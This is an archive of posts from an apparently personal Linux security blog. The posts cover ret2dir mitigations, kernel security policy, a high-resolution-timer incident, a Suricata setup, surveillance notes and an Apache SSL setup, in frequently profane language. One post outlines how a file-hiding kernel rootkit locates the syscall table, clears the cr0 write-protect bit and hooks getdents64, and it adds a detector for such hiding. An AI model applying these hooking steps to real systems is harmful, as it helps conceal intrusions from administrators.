A paper, "ret2dir: Rethinking Kernel Isolation", was released two years ago. It claimed that ret2dir can bypass modern mitigations including KERNEXEC/UDEREF/SMEP/SMAP/PXN. The authors proposed a defensive solution called eXclusive Page Frame Ownership (XPFO) in the paper, but it was not merged into the vanilla kernel back then. Some guys have been trying to merge it again lately.
ret2dir might be a dramatic exploit technique that can be useful to bypass mitigations. But it's not that "perfect" when it comes to PaX/Grsecurity. KERNEXEC does much more than SMEP/PXN, which simply stop the kernel from executing code in userspace pages. I'd like to share a few things (truths?):
1, Even with kernel <= 3.9, a kernel patched with PaX/Grsecurity can prevent the ret2dir attack without enabling any features. ret2dir only works if a few highly situational conditions are satisfied. More detail? Plz ask those who did the tricks;-)
2, The full ret2dir attack depends on PFN information. The paper reveals two approaches to get that information:
1) simply read the info from /proc
2) physmap spraying
Unfortunately, all exploits we've found (public exploits & ones unpacked from malware) in the past 18 months use the 1st approach. The evidence shows that all other ret2dir exploits are copycats of these two ret2dir exploit examples (exploit writers aren't working hard?):
IMOHO, ROP is the only option left for a ret2dir attack. But creating a ROP chain is not that easy on a PaX/Grsecurity kernel even without RAP, is it?
Just keep your mind open and suck in the experience.And if it hurts,it's probably worth it.God is Love!
Thursday, September 15, 2016
Friday, November 06, 2015
Is Linux kernel secure?
I've read an article, "Net of insecurity: The kernel of the argument", from The Washington Post today. It's a fuc*ing good one. I've been tortured by the security status of the *stable* Linux kernel for a fuc*ing long time. I've never seen an article that can talk about the truth like this one. Many commercial customers (especially from financial data centres) have been in pain using commercial GNU/Linux products for years. Remember those 0ld good null-deref exploits and the Enlightenment framework back in the 2000s? What did Linus and these commercial GNU/Linux vendors respond back then? They said "A bug is a bug" on one hand, and that SELinux can protect your assets on the other. Unfortunately, those are lies, as always.......
I'm not going to talk about that shitty history right here. You can google it if you really want to know the truth. A little advice: you could start from here.
Well, speaking of the history of mitigation, I highly recommend you go through thinkst's presentation at BH'10. Who the hell can explain the history in such detail like he did;-)
Black Hat USA 2010: Memory Corruption Attacks: The Almost Complete History
http://thinkst.com/resources/slides/bh-2010-haroon-meer-keynote.pdf
1/5: https://www.youtube.com/watch?v=stVz9rhTdQ8
2/5: https://www.youtube.com/watch?v=HJwg5vdoWCY
3/5: https://www.youtube.com/watch?v=5vDRCi6OQuw
4/5: https://www.youtube.com/watch?v=9edv8FwmJzk
5/5: https://www.youtube.com/watch?v=4XEe5I4Wsrc
"As long as there is technology, there will be hackers. As long as there are hackers, there will be PHRACK magazine."( Quoted from Phrack Issue 63). As long as there are vulnerabilities, there will be exploits. As long as there are exploits, there will be mitigation.........
Basically, the possible evolution of an exploitable bug looks like this:
---------------------------------------
Bug –> exploitable bug (vulnerability) –> PoC –> exploit –> reliable/weaponized exploit
---------------------------------------
That's where the problem comes in. There are two philosophical ideas about how to deal with exploitable bugs.
1, Linus Torvalds represents the philosophy of "A bug is a bug", which holds that any exploitable bug should be taken care of like a normal bug. When one is found, just fix it. Any security mitigation is a complete waste of CPU. Developers should focus only on features and performance. He (and his followers) even believe that keeping bug info obscure is the way to stop attackers and that "security through obscurity" is an effective approach for Linux kernel upstream.
2, PaX Team and spender are the most fascinating guys on the side of security mitigation. They (I) believe that the countless exploitable bugs cannot be solved once and for all by fixing them one by one. But we can design specific security mitigations against specific types of vulnerabilities. That's the only way to solve this issue.
Well, those two philosophical ideas are totally different. Why the hell does this happen? IMOHO, one of the main reasons is that the threat models are totally different. In my own adversary model, the attackers may have weaponized exploits developed by a digital armory (Vupen, HT?) or the underground, while there are only skiddies in Linus's threat model (so it seems, at least;-)).
Some commercial GNU/Linux vendors basically believe that a public exploit is the most important factor influencing their risk assessment. Don't believe that? They admitted it themselves;-)
A lot of my customers always say one of the reasons they chose GNU/Linux as their alternative to UNIX is that GNU/Linux is secure. I've been wondering all the time and responding like "ARE U fuc*ing serious?". Now GNU/Linux is diving into the next age of the Internet, which some people like to call IoT (Internet of Things). But the question is: Is the Linux kernel ready to face tons of cybercriminals? You fuc*ing tell me........
btw: Kernel/Compiler/Firmware are very important core infrastructures of the modern cyber world. A lot of good people are busy defending our world with their efforts. The PaX/Grsecurity guys are my heroes. Reproducible builds (based on the theory of DDC, by David A. Wheeler) are definitely gonna piss the NSA off. CHIPSEC (for firmware) may be the starting point. I do believe only refined FOSS solutions can make this world a little more secure......
Thursday, April 09, 2015
Debian GNU/Linux security checklist and hardening
The 1st time I met Debian GNU/Linux was about a decade ago when I was a college dude. Stupid college life was too boring back then;-) It was almost the same time I met the Phrack ezine for the 1st time. Damn, time is running on...
Anyway, I'd like to share this article, "Debian GNU/Linux security checklist and hardening", with you guys. H0pe you can find your peace in this pathetic era;-) Yeah..yeah..I just wanna say: "Phrack is not dead, PaX/Grsecurity is not dead, DNFWAH is not dead, 0ld sch00l is not dead, the Underground spirit is not dead.....If they were, that'd be on us!!!".
Tuesday, March 17, 2015
HIGHRES TIMER can be your DoS nightmare
This is a real-life story about the HIGH RESOLUTION TIMER and how lame coders use it to make a self-DoS;-) You should be very cautious if your system was written by that type of coder.
Incident:
1, A dozen RHEL 6 GNU/Linux servers were extremely slow while running some *** applications. Kernel CPU usage was about 40%-50%.
2, The "free" column from vmstat did not look OK. "free" kept increasing while "buff" & "cache" kept decreasing as a bunch of data went through. Then the kernel gave you a *hint* about OOM (Out of Memory): "kernel panic - not syncing: Out of memory and no killable processes..." The kernel tried to kill processes one by one until shit happened, which was a kernel panic.
I began this investigation with strace. The result was quite strange. Why would the application (malware?) invoke the syscall nanosleep() so often? Every 10000ns (10us)? Seriously? All I can tell is that the application doesn't need to do real-time work.
--------------------------------------------------------------
15:30:08.002047 nanosleep({0, 10000}, NULL) = 0 <0.000082>
15:30:08.002175 nanosleep({0, 10000}, NULL) = 0 <0.000074>
15:30:08.002297 nanosleep({0, 10000}, NULL) = 0 <0.000074>
...
15:30:09.917557 nanosleep({0, 10000}, NULL) = 0 <0.000075>
15:30:09.917661 nanosleep({0, 10000}, NULL) = 0 <0.000071>
--------------------------------------------------------------
The customer said it never happened on 0ld good GNU/Linux systems (like RHEL 5). My gut pointed me in a direction: the High Resolution Timer, a type of kernel timer that provides more accurate time measurement. I read the Linux manual and the very well explained kernel doc and learned that HIGHRES TIMER was added to the upstream code in 2.6.21. So I guess..just guess..some lazy & lame coder just wanted to make the program "sleep" for a very "short" time, and wrote this code very confidently:
usleep(10);
If you're running a Linux kernel before 2.6.21, this line of code sleeps between 1ms and 2ms. But..the annoying *but* is coming..if you're running a *modern* GNU/Linux distro with HIGHRES support, the same code sleeps 10us, which might cause a performance hit. The CentOS community had a similar issue before:
From the evidence we have, two clues lead us to the crime scene, the High Resolution Timer:
1, nanosleep() has been invoked >=8k times every fuc*ing second.
2, The victim kernel was not running with kdump, but we still have some kernel logs. According to the call trace, the kernel was playing with a HIGHRES-related context, which should not be a coincidence:
--------------------------------------------------------------
[ ] ? audit_syscall_exit+0x27e/0x290
[ ] ? sysret_audit+0x16/0x20
[ ] ? __hrtimer_start_range_ns+0x1a3/0x460
[ ] ? sysret_audit+0x16/0x20
[ ] ? sysret_audit+0x16/0x20
[ ] ? audit_filter_rules+0x2d/0xa10
[ ] ? audit_syscall_exit+0x27e/0x290
[ ] ? sysret_audit+0x16/0x20
schedule_timeout: wrong timeout value ffffffffffffb572
--------------------------------------------------------------
Solution: I'm giving you two options:
1, Modify the source code (if you have it) around the *sleep*-related functions and tell the fuc*ing coders they can go home and fuck themselves.
2, Append "nohz=off highres=off" to /etc/grub.conf to turn this feature fuc*ing off.
Testing result: Unfortunately, we had to test this in a production system..but we did it.
+-----------+--------------+--------------+
| Item      | HIGHRES ON   | HIGHRES OFF  |
+-----------+--------------+--------------+
| nanosleep | >8,000 times | 345 times    |
+-----------+--------------+--------------+
| buff/cache| Decreasing   | Increasing   |
+-----------+--------------+--------------+
| %sys      | 50%          | 6%           |
+-----------+--------------+--------------+
Well, I guess we arrested the *perpetrator* this time. Damn...not every business impact is caused by security issues;-)
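As an added example (my code, not the application from the incident), a small C program that measures what the usleep(10) above really costs on the running kernel and turns the average into the calls-per-second figure strace showed; the function names and the 1 ms threshold are my own assumptions.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <time.h>

static long long now_ns(void)
{
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (long long)ts.tv_sec * 1000000000LL + ts.tv_nsec;
}

/* Sleep `req_ns` nanoseconds `iters` times, the way usleep(10) in a
 * polling loop does, and return the average time one call really took.
 * nanosleep(2) never returns early (except for signals), so the result
 * is >= req_ns; how much bigger depends on the kernel's timer resolution. */
long long measure_sleep_ns(long req_ns, int iters)
{
    struct timespec req = { req_ns / 1000000000L, req_ns % 1000000000L };
    long long start = now_ns();
    for (int i = 0; i < iters; i++) {
        struct timespec rem = req;
        /* Restart if a signal interrupts the sleep so the measurement
         * still covers the full requested interval. */
        while (nanosleep(&rem, &rem) != 0) { }
    }
    return (now_ns() - start) / iters;
}

/* How many nanosleep() calls per second a tight loop of this sleep
 * produces, i.e. the rate seen in the strace output above. */
long calls_per_second(long long avg_ns)
{
    return avg_ns > 0 ? (long)(1000000000LL / avg_ns) : 0;
}

/* A 10us request that really takes well under a millisecond means hrtimers
 * are active (highres on); on a tick-based kernel, or with highres=off, the
 * same request rounds up to at least one jiffy (1-2 ms at HZ=1000).
 * The 1 ms boundary is an assumption chosen to separate the two cases. */
int highres_timers_active(long long avg_ns)
{
    return avg_ns < 1000000LL;
}

int main(void)
{
    long long avg = measure_sleep_ns(10000, 2000);   /* same as usleep(10) */
    printf("nanosleep(10us): avg %lld ns, ~%ld calls/s, highres: %s\n",
           avg, calls_per_second(avg),
           highres_timers_active(avg) ? "on" : "off");
    return 0;
}
```

Run it before and after booting with highres=off: the calls-per-second figure is the number you would otherwise have to dig out of strace.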
Monday, March 31, 2014
Suricata's file extraction on Debian GNU/Linux
Suricata is a high performance open source IDS/IPS project. I used it a long time ago, around 2010 when it was released. I've been playing with Snort recently and then found Suricata has a great feature: file extraction. It'd be helpful to those who want to get malware samples from the IDS. Anyway, like in the old days, I want to test it on my own and see how it works on Debian. First things first, I need to build it and see if it works.
Download the latest version of the small installation ISO image. I need to clarify my testing environment: Debian is running on my virtual machine, which has two NICs, eth0 and eth1. Interface eth0 is running in NAT mode and eth1 in bridge mode. Debian doesn't assign any IP address to eth1.
Because our Debian is the small installation, we have to install some dependency packages via apt-get:
#apt-get install vim openssh-server ethtool libpcap-dev libnfnetlink-dev libnetfilter-queue-dev libdnet-dev libdumbnet-dev libpcre3-dev libpcre3-dbg bison flex make zlib1g-dev autoconf libtool libnss3-dev libnspr4-dev libjansson4 libjansson-dev libyaml-dev libcap-ng0 libcap-ng-dev libnet1-dev libmagic-dev build-essential
Get the source code of Suricata:
#cd /tmp
#wget http://www.openinfosecfoundation.org/download/suricata-2.0.tar.gz
#tar zxvf suricata-2.0.tar.gz
#cd suricata-2.0
Compile and installation:
#./configure --enable-nfqueue --enable-gccprotect --prefix=/usr/local/suricata --localstatedir=/var
#make -j3
#make install-full
Edit suricata.yaml:
1, Set the request/response body limits a little bigger:
request-body-limit: 1gb #3072
response-body-limit: 1gb #3072
2, Enable file extraction:
  - file-store:
      enabled: yes       # set to yes to enable
      log-dir: files     # directory to store the files
      force-magic: no    # force logging magic on all stored files
      force-md5: no      # force logging of md5 checksums
      waldo: file.waldo  # waldo file to store the file_id across runs

  # output module to log files tracked in a easily parsable json format
  - file-log:
      enabled: yes
      filename: files-json.log
      append: yes
      #filetype: regular # 'regular', 'unix_stream' or 'unix_dgram'
3, Add our "test" rule file (test.rules in this case) to the rule-files list under "default-rule-path:", like:
default-rule-path: /usr/local/suricata/etc/suricata/rules
rule-files:
 - test.rules
 - botcc.rules
Create a rule file:
/usr/local/suricata/etc/suricata/rules/test.rules
Add one line to test.rules (to save any jpg files):
alert http any any -> any any (msg:"FILESTORE jpg"; fileext:"jpg"; filestore; sid:6; rev:1;)
Bring up eth1:
#ifconfig eth1 up
According to Suricata's wiki, we should turn off the NIC offloading features (GSO and friends):
ethtool -K eth1 tso off
ethtool -K eth1 gro off
ethtool -K eth1 lro off
ethtool -K eth1 gso off
ethtool -K eth1 rx off
ethtool -K eth1 tx off
ethtool -K eth1 sg off
ethtool -K eth1 rxvlan off
ethtool -K eth1 txvlan off
ethtool -N eth1 rx-flow-hash udp4 sdfn
ethtool -N eth1 rx-flow-hash udp6 sdfn
ethtool -n eth1 rx-flow-hash udp6
ethtool -n eth1 rx-flow-hash udp4
ethtool -C eth1 rx-usecs 1000
ethtool -C eth1 adaptive-rx off
Run the Suricata with this command:
/usr/local/suricata/bin/suricata -c /usr/local/suricata/etc/suricata/suricata.yaml -i eth1
Use your firefox/chrome on your host machine, and visit some website, like this.
You should see some girl pictures in /var/log/suricata/files ;-)
btw: Thanks to the Suricata community for bringing us this fuc*ing awesome IDS/IPS project. Special thanks to Peter Manev.
Thursday, February 06, 2014
Simple linux rootkit on Debian with kernel 3.13
I wasted a lot of time in 2013. I always found some shitty excuses, like "I'm fucking busy recently", to delay my hacking journey into kernel rootkits. This was supposed to be done a couple of months ago. Thank L0rd! I found a slot during the Chinese new year vacation at my hometown and began the adventure of rootkit hacking. I've read a bunch of great Phrack papers from the good old hacking days. They're old but they help.
---------------------------------------------------------------
[Weakening the Linux Kernel, Phrack Magazine Volume 8, Issue 52
January 26, 1998, article 18 of 20]
http://www.phrack.org/issues.html?issue=52&id=18&mode=txt
[Advances in Kernel Hacking, Volume 0x0b, Issue 58, Phile #0x06 of
0x0e]
http://www.phrack.org/issues.html?issue=58&id=6&mode=txt
[Handling Interrupt Descriptor Table for fun and profit, Volume 0x0b,
Issue 59, Phile #0x04 of 0x12]
http://www.phrack.org/issues.html?issue=59&id=4&mode=txt
[Kernel Rootkit Experiences, Volume 0x0b, Issue 61, Phile 0x0e of
0x0f]
http://www.phrack.org/issues.html?issue=61&id=14&mode=txt
[Mistifying the debugger, Volume 0x0c, Issue 65, Phile #0x08 of
0x0f]
http://www.phrack.org/issues.html?issue=65&id=8&mode=txt
Especially thanks to THC's paper, which was released in 1999:
[Complete Linux Loadable Kernel Modules]
https://www.thc.org/papers/LKM_HACKING.html
---------------------------------------------------------------
I wrote a simple rootkit that can only hide a specific file. Just a
few old school steps make this feature possible:
Firstly, we need to retrieve the system call table. But it's no longer
exported since 2.6. Fortunately, a few system calls are still
exported. sys_close() is one of them:
--------------------------------------
root@d6-test:/home/shawn# grep sys_close /boot/System.map-3.13.0
c10e0aa1 T sys_close
c140fdc4 R __ksymtab_sys_close
c141815c r __kcrctab_sys_close
c1420e33 r __kstrtab_sys_close
--------------------------------------
I used a brute force way to locate the system call table. I learned it from
memset's blog:
https://memset.wordpress.com/2011/03/18/syscall-hijacking-dynamically-obtain-syscall-table-address-kernel-2-6-x-2/
The starting memory address is 0xc0000000; from there it keeps trying until
it locates the entry holding sys_close()'s address.
Then the write-protection bit in cr0 has to be cleared. The WP bit is
bit 16 of the cr0 register:
 31 30 29 28 ........... 19 18 17 16 15 ...........  6  5  4  3  2  1  0
+--+--+--+-----------------+--+--+--+-----------------+--+--+--+--+--+--+
|PG|CD|NW|    reserved     |AM|--|WP|    reserved     |NE|ET|TS|EM|MP|PE|
+--+--+--+-----------------+--+--+--+-----------------+--+--+--+--+--+--+
After we've done the above steps, we are able to hijack the system call we
want. Here I chose to hijack getdents64(). Why? Because all I wanna
do is hide a specific file from "ls". Let's see what "ls" usually
does:
------------------------------------------
// begin.........
execve("/bin/ls", ["ls"], [/* 16 vars */]) = 0
brk(0) = 0x8366000
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7791000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY) = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=19346, ...}) = 0
.......................
.......................
.......................
// look, that's it
getdents64(3, /* 17 entries */, 32768) = 544
getdents64(3, /* 0 entries */, 32768) = 0
close(3) = 0
fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 2), ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7790000
.......................
// then it would display them in the standard out(1)
write(1, "a.out dirent.c dirent.c~ insi"..., 107a.out dirent.c dirent.c~ insight-lab libmnl libnftables linux-3.13 linux-3.13.tar my_tmp nftables
) = 107
.......................
------------------------------------------
The only struct from the kernel we have to face is:
-------------------------------------------------------------------
struct linux_dirent {
    unsigned long  d_ino;     /* Inode number */
    unsigned long  d_off;     /* Offset to next linux_dirent */
    unsigned short d_reclen;  /* Length of this linux_dirent */
    char           d_name[];  /* Filename (null-terminated) */
                              /* length is actually (d_reclen - 2 -
                                 offsetof(struct linux_dirent, d_name)) */
    /*
    char           pad;       // Zero padding byte
    char           d_type;    // File type (only since Linux 2.6.4;
                              // offset is (d_reclen - 1))
    */
}
-------------------------------------------------------------------
d_reclen is the size of the current linux_dirent64 record, and it does matter. Plz
read the fucking source code for any detail! Well, like in the good old days, I drew a big ascii picture here.
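As an added defender-side example (my code, not the rootkit from this post), a user-space checker that reads a directory through the raw getdents64 syscall, the same path ls takes, walks the buffer by d_reclen, and flags a name that lstat() resolves but the listing omits, which is exactly the symptom a getdents64 hook produces. It uses the linux_dirent64 layout that getdents64 actually fills (d_type sits right after d_reclen, unlike the older linux_dirent above); function names are my own.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Record layout getdents64(2) writes into the caller's buffer. Records are
 * variable length: d_reclen (name and padding included) is the only correct
 * way to step to the next one. */
struct linux_dirent64 {
    uint64_t d_ino;
    int64_t  d_off;
    uint16_t d_reclen;
    uint8_t  d_type;
    char     d_name[];
};

#define DIRENT_HDR offsetof(struct linux_dirent64, d_name)

/* Walk a getdents64 buffer of `nread` bytes, calling cb() on each record
 * (a non-zero return stops the walk). Returns the number of records seen,
 * or -1 on a malformed record (truncated header, d_reclen too small or
 * running past the buffer, name not NUL-terminated) instead of looping
 * forever or reading out of bounds. Hypothetical helper, not kernel code. */
int walk_dirents(const char *buf, size_t nread,
                 int (*cb)(const struct linux_dirent64 *, void *), void *arg)
{
    size_t pos = 0;
    int count = 0;
    while (pos < nread) {
        if (nread - pos < DIRENT_HDR)
            return -1;
        const struct linux_dirent64 *d = (const void *)(buf + pos);
        if (d->d_reclen <= DIRENT_HDR || d->d_reclen > nread - pos ||
            memchr(d->d_name, '\0', d->d_reclen - DIRENT_HDR) == NULL)
            return -1;
        count++;
        if (cb && cb(d, arg))
            break;
        pos += d->d_reclen;
    }
    return count;
}

struct lookup { const char *name; int found; };

static int match_cb(const struct linux_dirent64 *d, void *arg)
{
    struct lookup *l = arg;
    if (strcmp(d->d_name, l->name) == 0) {
        l->found = 1;
        return 1;
    }
    return 0;
}

/* List `dir` with the raw syscall (the path ls takes) and report whether
 * `name` appears: 1 = present, 0 = absent, -1 = cannot read the directory. */
int raw_listing_has(const char *dir, const char *name)
{
    char buf[32768];
    struct lookup l = { name, 0 };
    int fd = open(dir, O_RDONLY | O_DIRECTORY);
    if (fd < 0)
        return -1;
    for (;;) {
        long n = syscall(SYS_getdents64, fd, buf, sizeof buf);
        if (n < 0 || (n > 0 && walk_dirents(buf, (size_t)n, match_cb, &l) < 0)) {
            close(fd);
            return -1;
        }
        if (n == 0 || l.found)
            break;
    }
    close(fd);
    return l.found;
}

/* A name that lstat() resolves but the listing omits is the fingerprint of
 * a getdents64 hook like the one described above (or a filesystem bug).
 * Returns 1 = hidden, 0 = visible, -1 = cannot check (no such file or
 * unreadable directory). */
int hidden_from_listing(const char *dir, const char *name)
{
    char path[4096];
    struct stat st;
    snprintf(path, sizeof path, "%s/%s", dir, name);
    if (lstat(path, &st) != 0)
        return -1;
    int r = raw_listing_has(dir, name);
    return r < 0 ? -1 : (r == 1 ? 0 : 1);
}

int main(int argc, char **argv)
{
    if (argc != 3) {
        fprintf(stderr, "usage: %s <dir> <name>\n", argv[0]);
        return 2;
    }
    int r = hidden_from_listing(argv[1], argv[2]);
    printf("%s/%s: %s\n", argv[1], argv[2],
           r == 1 ? "HIDDEN from getdents64" : r == 0 ? "visible" : "cannot check");
    return r == 1;
}
```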
May the L0rd's hacking spirit guide us!!!
Wednesday, December 25, 2013
Life was never easy...especially in post-prism era;-)
I've watched a great free speech today:
Bruce Schneier, our great philosopher in the cybersec field, and Eben Moglen, who afaik is a great hacker (not in computer stuff) in the free software law field. I do remember I used to listen to Eben's free speeches (electronic version) when I was in college. Seven years on, I understand better why a group of people has been fighting for digital rights, software freedom, etc.....
I'm here to share something I've learned from Bruce and Eben today. This writeup is going to be my notes and a personal summary of 2013. It may be a little messy;-)
What do we learn from Mr Snowden's disclosure about crypto?
------------------------------------------------------------------
Cryptography itself is still hard to break. The NSA is not breaking the math but breaking in by cheating: by stealing private keys, by forging certificates, by doing non-crypto stuff to achieve their *dirty* goals. Even in the fucked-up case of Google, the NSA didn't crack the traffic between the user's browser and Google's server, because Google uses client-auth SSL by default and, more importantly, it works (the NSA doesn't like it). But the NSA hijacked the traffic between Google data centers, where SSL/TLS was removed for whatever reason (cost?). Crypto is still one of the best ways to fight the NSA or NSA-like organizations.
Tor stories?
------------------------------------------------------------------
Personally, I like Tor. It could probably save people's lives in some "restricted" areas. Tor pisses off agencies like the NSA. The contributors to the Tor project have routine seminars, and it seems the discussion of how to break Tor is their daily bread;-) Thanks to the Tor project contributors.
What if NSA is in our threat model?
------------------------------------------------------------------
The 1st thing is mitigation: NSA got a piece of math but still needs a bunch of engineers to make it work. Make NSA pay a higher cost (time budget, not new math). Plz use specific crypto technology (on a GNU/Linux distro) as much as possible. It's reasonable to speculate that NSA has something about crypto that we don't. Information asymmetry does exist. Of course NSA has known what we did in past decades, but we rarely knew what NSA was doing in the same period... so thanks to Mr Snowden, whose disclosure gave us *a little more* information.
And NSA-like organizations definitely need a lot of automated attack tools: foxasset? The reason is simple: you can't just train people off the street to become old school hackers in a few months. That's why they have to develop automated tools.
btw: What does old school hacker mean in my context? A type of people who are highly skilled in low-level techniques, such as *NIX systems, networking (both internet stuff and the core network of telcos), reversing, cryptography, C/ASM code audit, etc., and who also have a specific type of strong philosophy with underground spirit;-)....ug spirit~wth
Standard corruption?
------------------------------------------------------------------
It's not that every standard matters for security. Bruce thinks AES is still secure. We can't blame only the Dual ECC stuff on the standards process's fault. Implementation is important; for example, the non-NSA-involved international cellphone standard was fucked up... A5/1? Ring a bell? We should only trust those public standards that our guys (free software enthusiasts, cybersec philosophical anarchists like the Phrack guys, or people like Bruce?:)) are getting involved with.
What tools can we trust?
------------------------------------------------------------------
GNUPG, Tor, OTR, etc... Some of these open source tools are written by security/crypto paranoids. They have a very awesome design and implementation.
What if you are on the target list of an NSA-like organization?
------------------------------------------------------------------
If you are targeted, there's nothing you can do at that level. Is this super-APT shit?
Is cyberwar going to end?
------------------------------------------------------------------
I don't think so. If everyone holds the philosophy of "I'll fuck you if you don't fuck me first, sir", then the whole scene turns into everybody being fucked by everybody. That's what old school hackers have been through in the paradigm shift (painfully?) from the good old hacking days to "This is cyber, sir!".
Does that sound like we are hopeless?
------------------------------------------------------------------
Nope, quoting Bruce: "Society improves because people dare to think the unthinkable and then after 20, 30 years everyone says that was kind of good idea. It takes a while but it has to start."
FOSS solutions?
------------------------------------------------------------------
Bruce thinks open source solutions are more secure than closed ones, because:
1, You can look at it (source code)
2, It's harder for someone to slip something in
We probably don't need to worry too much (did I say "too much"?) about NSA having tried, trying or going to try to put a backdoor in some fundamental free software projects, like the Linux kernel, GCC, glibc, the "supposed to be re-written" OpenSSL;-) etc. Because according to the fully disclosed documents, NSA seems amazingly risk-averse. They only want to take the safe path. Yeah... yeah, I know what they're thinking: you can do evil, but don't get caught;-) The free/open source community has a lot of old school hackers who have been doing code review for decades. They did a great job, and they are going to continue this *secret* war against NSA-like organizations. So it's not easy to attack (backdoor) a compiler..... (and there are tons of guys like me who are trying to be old school hackers).
Leap of faith?
------------------------------------------------------------------
Yeah, it sounds perfect. But no one can guarantee you 100% security, and the fact is that you can't examine everything. You must trust them (the tools you use). Give yourself a little faith. Did Søren A. Kierkegaard say that we could feel comfortable using GCC;-)
Well, using Apple products (iPhone, iPad, iShit) and Microsoft products (Windows as a gaming platform, Office for whatever) is not a good option. Drop them, come on!
Hardware box issues: never patched for fully disclosed vulns:
------------------------------------------------------------------
In some countries, the cybersec business couldn't support small businesses. The reason is that most customers had/have the wrong concept of cybersec. They think the only thing you need to do is
buy a bunch of hardware boxes (firewall, IDS/IPS, UTM, NGFW, or whatever). Obviously, that violates the very important old school principles:
------------------------------------------------------------------
Security is NOT:
Security is NOT installing a firewall ..
Security is NOT a Product or Service .. ( by Schneier, Bruce )
Security is Not a Product; It's a Process .. ( by Schneier, Bruce )
A Security Audit is NOT "running a port scan and turning things off" ..
Security is:
Security is "Can you still continue to work productively/safely, without compounding the security breach"
Security is only as good as your "weakest link"
Security is "risk management" of your corporate resources (computers/people), required expertise, time management, implementation costs, data backup/recovery procedures ...
Security is a Process, Methodology, Costs, Policies and People
Security is "Can somebody physically walk out with your computers, disks, tapes, .. "
Security is 24x7x365 ... constantly ongoing .. never ending
Security is "learn all you can as fast as you can, without negatively affecting the network, productivity and budget"
------------------------------------------------------------------
In the past few years, more and more enterprise management guys are realizing that those hardware boxes can't solve the problem they were supposed to solve.* Right here, there's one thing you might want to know: some "sec box" vendors have been using a lot of open source code (Linux kernel, Snort, l7, Bro, etc.) but they never contribute to the community. *........ Personally I do believe that only old school cybersec principles can make a system secure. But it needs skilled people to do a lot of work in the daily cybersec process. Well, mainstream marketing still advertising the *boxes* solution is one thing, while it's hard to find old school guys is another.
What I'm trying to say is not that hardware boxes are unimportant. But people can also do small business by trying to find cheap and effective solutions. That's where open source cybersec solutions fit in. There are a lot of great cybersec open source projects. All you have to do is pay someone who knows these cybersec open source code bases and combine them into your own cybersec solution. For example, a customer wants to harden their network and servers. There are a lot of open source sec projects that can do that, such as iptables/snort/psad/tcpwrapper/apparmor/openssl/apache or web-level hardening stuff (inside Django for preventing SQL injection, mod_security, etc.). But the customer would pay someone who knows about it to consult for them. The skilled guy could train the customer's IT guys or go through with their own implementation. Personally, I think it's the best way to do cybersec small business. It's a win-win solution! Old school guys get paid and customers are happy.
btw: Some regions may have this cybersec small business model already.
--------------------------------------------------------------------------
Well, it's Christmas today. As a Neo-Calvinist, I wouldn't talk about religion too much in my daily life. But all in all, a neo-calvinist is a Christian indeed. I'm not too religious. Sometimes, I really hate those nominal christians who feel so good doing terrible things in the name of god....fuc* them....Anyway, a hacker is a type of person who is willing to seek the truth no matter the cost. Even if I see L0rd Jesus looking like the Overmind (from StarCraft) after I die, the problem to me would be "Is it true my L0rd looks like the Overmind?"; if he is the L0rd, whatever he looks like, I'd still worship him;-)
Hacker can pick the red pill.
Hacker can destroy the blue pill.
Hacker can embrace the desert of the real.
Merry Christmas, my fellow brothers/sisters!
May L0rd's hacking spirit guide us in 2014!!!
Wednesday, November 27, 2013
How to set up apache2 with SSL/TLS support and client auth on Debian 7.2
I think SSL/TLS should be part of the security hardening process. Only fools would not use cryptography in the post-PRISM era. I think what Mr Snowden did proved one thing: Richard Stallman and the Phrack guys (I prefer the term "philosophical anarchist") never lied to us;-) Well, I don't wanna bullshit anything about this controversial topic here... let's see how we can set up an HTTPS server with client auth.
Generate CA certificates:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# cp /usr/lib/ssl/misc/CA.sh .
root@d6-test:/opt/ssl# ./CA.sh -newca
CA certificate filename (or enter to create)
Making CA certificate ...
Generating a 2048 bit RSA private key
..................................+++
..............................................+++
writing new private key to './demoCA/private/./cakey.pem'
.............................................
.............................................
Country Name (2 letter code) [AU]:CN
State or Province Name (full name) [Some-State]:Shanghai
Locality Name (eg, city) []:Shanghai
Organization Name (eg, company) [Internet Widgits Pty Ltd]:MOT
Organizational Unit Name (eg, section) []:MOT
Common Name (e.g. server FQDN or YOUR name) []:hardened-shit
Email Address []:info@hardened-shit.com
Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
Using configuration from /usr/lib/ssl/openssl.cnf
Enter pass phrase for ./demoCA/private/./cakey.pem:
Check that the request matches the signature
Signature ok
Certificate Details:
Serial Number:
c0:81:0e:bc:52:d0:19:5a
Validity
Not Before: Nov 19 02:08:14 2013 GMT
Not After : Nov 18 02:08:14 2016 GMT
Subject:
countryName = CN
stateOrProvinceName = Shanghai
organizationName = MOT
organizationalUnitName = MOT
commonName = hardened-shit
emailAddress = info@hardened-shit.com
X509v3 extensions:
X509v3 Subject Key Identifier:
D5:38:4C:2F:FE:CF:E5:19:E9:AC:C5:03:6E:81:6A:D9:15:8F:A8:63
X509v3 Authority Key Identifier:
keyid:D5:38:4C:2F:FE:CF:E5:19:E9:AC:C5:03:6E:81:6A:D9:15:8F:A8:63
X509v3 Basic Constraints:
CA:TRUE
Certificate is to be certified until Nov 18 02:08:14 2016 GMT (1095 days)
Write out database with 1 new entries
Data Base Updated
--------------------------------------------------------------------------------
Copy intermediate key and certificate:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# cp demoCA/private/cakey.pem ca.key
root@d6-test:/opt/ssl#
root@d6-test:/opt/ssl# cp demoCA/cacert.pem ca.crt
--------------------------------------------------------------------------------
Generate server key:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl genrsa -des3 -out server.key 2048
